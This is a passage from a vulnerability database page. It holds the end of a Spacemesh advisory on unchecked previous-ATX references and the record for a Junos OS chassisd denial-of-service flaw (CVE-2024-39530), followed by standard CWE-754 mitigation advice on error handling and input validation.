    "github_reviewed_at": "2024-05-10T15:33:40Z",
    "nvd_published_at": "2024-05-14T15:38:45Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nNodes can publish ATXs which reference the incorrect previous ATX of the Smesher that created the ATX. ATXs are expected to form a single chain from the newest to the first ATX ever published by an identity. Allowing Smeshers to reference an earlier (but not the latest) ATX as previous breaks this protocol rule and can serve as an attack vector where Nodes are rewarded for holding their PoST data for less than one epoch but still being eligible for rewards.\n\n### Patches\n- API needs to be extended to be able to fetch events from a node that dected malicious behavior of this regard by the node\n- go-spacemesh needs to be patched to a) not allow publishing these ATXs any more and b) create malfeasance proofs for identities that published invalid ATXs in the past.\n\n### Workarounds\nn/a\n\n### References\nSpacemesh protocol whitepaper: https://spacemesh.io/blog/spacemesh-white-paper-1/, specifically sections 4.4.2 (\"ATX Contents\") and 4.4.3 (\"ATX validity\")",
  "id": "GHSA-jcqq-g64v-gcm7",
  "modified": "2024-05-14T19:54:27Z",
  "published": "2024-05-10T15:33:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/spacemeshos/go-spacemesh/security/advisories/GHSA-jcqq-g64v-gcm7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34360"
    },
    {
      "type": "WEB",
      "url": "https://github.com/spacemeshos/api/commit/1d5bd972bbe225d024c3e0ae5214ddb6b481716e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/spacemeshos/go-spacemesh/commit/9aff88d54be809ac43d60e8a8b4d65359c356b87"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/spacemeshos/go-spacemesh"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2024-2831"
    },
    {
      "type": "WEB",
      "url": "https://spacemesh.io/blog/spacemesh-white-paper-1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Previous ATX is not checked to be the newest valid ATX by Smesher when validating incoming ATX"
}

GHSA-JFWC-JH6J-8HRP

Vulnerability from github – Published: 2024-07-11 18:31 – Updated: 2024-07-11 18:31
VLAI
Details

An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis management daemon (chassisd) of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause a

Denial-of-Service (DoS).

If an attempt is made to access specific sensors on platforms not supporting these sensors, either via GRPC or netconf, chassisd will crash and restart leading to a restart of all FPCs and thereby a complete outage.

This issue affects Junos OS:

  • 21.4 versions from 21.4R3 before 21.4R3-S5,
  • 22.1 versions from 22.1R3 before 22.1R3-S4,
  • 22.2 versions from 22.2R2 before 22.2R3,
  • 22.3 versions from 22.3R1 before 22.3R2-S2, 22.3R3,
  • 22.4 versions from 22.4R1 before 22.4R2.

This issue does not affect Junos OS versions earlier than 21.4.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-39530"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-11T16:15:04Z",
    "severity": "HIGH"
  },
  "details": "An Improper Check for Unusual or Exceptional Conditions vulnerability in the chassis management daemon (chassisd) of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause a \n\nDenial-of-Service (DoS).\n\nIf an attempt is made to access specific sensors on platforms not supporting these sensors, either via GRPC or netconf, chassisd will crash and restart leading to a restart of all FPCs and thereby a complete outage.\n\nThis issue affects Junos OS:\n\n\n\n  *  21.4 versions from 21.4R3 before 21.4R3-S5,\n  *  22.1 versions from 22.1R3 before 22.1R3-S4,\n  *  22.2 versions from 22.2R2 before 22.2R3,\n  *  22.3 versions from 22.3R1 before 22.3R2-S2, 22.3R3,\n  *  22.4 versions from 22.4R1 before 22.4R2.\n\n\nThis issue does not affect Junos OS versions earlier than 21.4.",
  "id": "GHSA-jfwc-jh6j-8hrp",
  "modified": "2024-07-11T18:31:13Z",
  "published": "2024-07-11T18:31:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39530"
    },
    {
      "type": "WEB",
      "url": "https://supportportal.juniper.net/JSA82989"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

Mitigation MIT-3
Requirements

Strategy: Language Selection

  • Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • Choose languages with features such as exception handling that force the programmer to anticipate unusual conditions that may generate exceptions. Custom exceptions may need to be developed to handle unusual business-logic conditions. Be careful not to pass sensitive exceptions back to the user (CWE-209, CWE-248).
Mitigation
Implementation

Check the results of all functions that return a value and verify that the value is expected.

Mitigation
Implementation

If using exception handling, catch and throw specific exceptions instead of overly-general exceptions (CWE-396, CWE-397). Catch and handle exceptions as locally as possible so that exceptions do not propagate too far up the call stack (CWE-705). Avoid unchecked or uncaught exceptions where feasible (CWE-248).

Mitigation MIT-39
Implementation
  • Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.
  • If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.
  • Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.
  • Exposing additional information to a potential attacker in the context of an exceptional condition can help the attacker determine what attack vectors are most likely to succeed beyond DoS.
Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation MIT-38
Architecture and Design Implementation

If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery.

Mitigation
Architecture and Design

Use system limits, which should help to prevent resource exhaustion. However, the product should still handle low resource conditions since they may still occur.

No CAPEC attack patterns related to this CWE.